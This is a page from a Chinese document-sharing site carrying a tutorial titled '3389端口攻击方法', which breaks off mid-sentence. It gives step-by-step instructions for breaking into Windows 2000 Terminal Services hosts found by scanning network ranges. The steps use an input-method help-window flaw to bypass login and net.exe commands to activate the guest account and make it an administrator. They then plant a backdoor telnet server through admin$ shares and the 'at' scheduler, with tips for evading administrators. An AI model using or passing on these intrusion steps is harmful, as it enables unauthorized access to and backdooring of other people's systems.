- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
1 3389端口攻击方法 WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。? WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。? 工具:客户端连接管理器,下载地址:/rj/WIN.zip,端口扫描器一个,推荐使用:流光、网络刺客2、superscan。? 入侵步骤:?一,获得管理员账号。? 我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入c:\winnt\system32。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。? 现在我们要获得一个账号,成为系统的合法用户。在该目录下找到net.exe,为net.exe创建一个快捷方式,右键点击该快捷方式,在“属性”-“目标”-c:\winnt\system32\net.exe后面空一格,填入user? guest?/active?:yes点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用user? 用户名 密码/add,创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入user? guest?密码,运行,于是guest便有了密码。最后,再次修改,填入“localgroup?administrators?guest? /add,将guest变成系统管理员。? 注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。? 2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。? 3、你所看到的图像与操作会有所延迟,这受网速的影响。二,创建跳板。? 再次登录终端用务器,以guest身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft? 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。退出对方系统,在本地机命令提示符下,输入?net?use? \\IP?Address\IPC$?[password]?/user:guset,通过IPC的远程登陆就成功了。? 登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。? copy?c:\hack\srv.exe?\\***.***.***.***\admin$?然后利用定时服务启动它,先了解对方的时间:?net?time? \\***.***.***.***?显示:?\\***.***.***.***?的当前时间是?2001/1/8?下午?08:55?命令成功完成。? 然后启动srv.exe:?at?\\***.***.***.***?09:00?srv.exe ?显示:?新加了一项作业,其作业?ID?=?0? 过几分钟后,telnet?***.***.***.***?99?这里不需要验证身份,直接登录,显示:?c:\winnt:\system32? 我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:?copy?c:\hack\ntlm.exe? \\02\admin$?把事先存放在ha
原创力文档


文档评论(0)